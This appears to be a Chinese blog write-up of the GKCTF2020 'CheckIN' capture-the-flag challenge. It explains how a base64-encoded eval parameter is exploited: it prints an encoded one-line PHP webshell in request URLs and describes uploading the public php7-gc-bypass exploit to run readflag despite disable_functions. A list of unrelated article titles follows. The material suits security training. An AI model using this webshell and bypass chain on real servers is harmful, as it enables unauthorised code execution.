[GKCTF2020]CheckIN 注意了解多方面的东西
2024-10-18 16:31:47
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参
首先传参phpinfo();
看看,需要经过base64编码
http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==
- 1
找到disable_functions,发现过滤了许多危险函数
我们上传一个一句话木马看看eval($_POST[123]);
,经过base64是ZXZhbCgkX1BPU1RbMTIzXSk7
执行
http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbMTIzXSk7
- 1
用菜刀,连不上,我呆了,还好有个蚁剑
再试一下,成功了
发现了flag,结果打不开,也修改不了权限
打开readflag看看,有乱码,想到是通过执行readflag来读取flag
然后怎么办,我在不会了。。。
看了大佬的wp后才知道做题要注意版本
通过phpinfo()知道php版本为7.3,这个版本有一个漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3
给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
下载后进行修改,改为执行readflag
然后通过蚁剑进行上传这里发现tmp目录权限是1777,于是决定上传到这个目录
点击此处上传
通过之前的一句话来执行文件包含,得到flag
最新文章
- ios - 谓词的使用
- JSON.stringify()
- Android 工程师如何快速学会web前段
- 部署Apache网站访问统计-AWStats分析系统
- Linux phpbb论坛的安装(中文版)
- PL/SQL 创建视图语法
- URAL 1957 Wrong Answer 暴力
- iOS中的深复制与浅复制
- 对setTimeout()第一个参数是字串的深入理解以及eval函数的理解
- 转:ProGuard 常见命令备份
- android开发之-软件设置保存-快速学会使用SharedPreferences篇-实测
- 自己实现的数据表格控件(dataTable),支持自定义样式和标题数据、ajax等各种自定义设置以及分页自定义
- io系列之其他事项
- JAVA8方法引用
- linux因勿删或误操作导致登录界面异常,命令无法使用,显示/bin/bash:No such file or directory
- PAT甲题题解-1008. Elevator (20)-大么个大水题,这也太小瞧我们做题者的智商了
- i春秋CTF web题(1)
- spring mvc简单的demo(注解版)
- python初步学习-python函数 (二)
- 使用Zabbix监控rabbitmq服务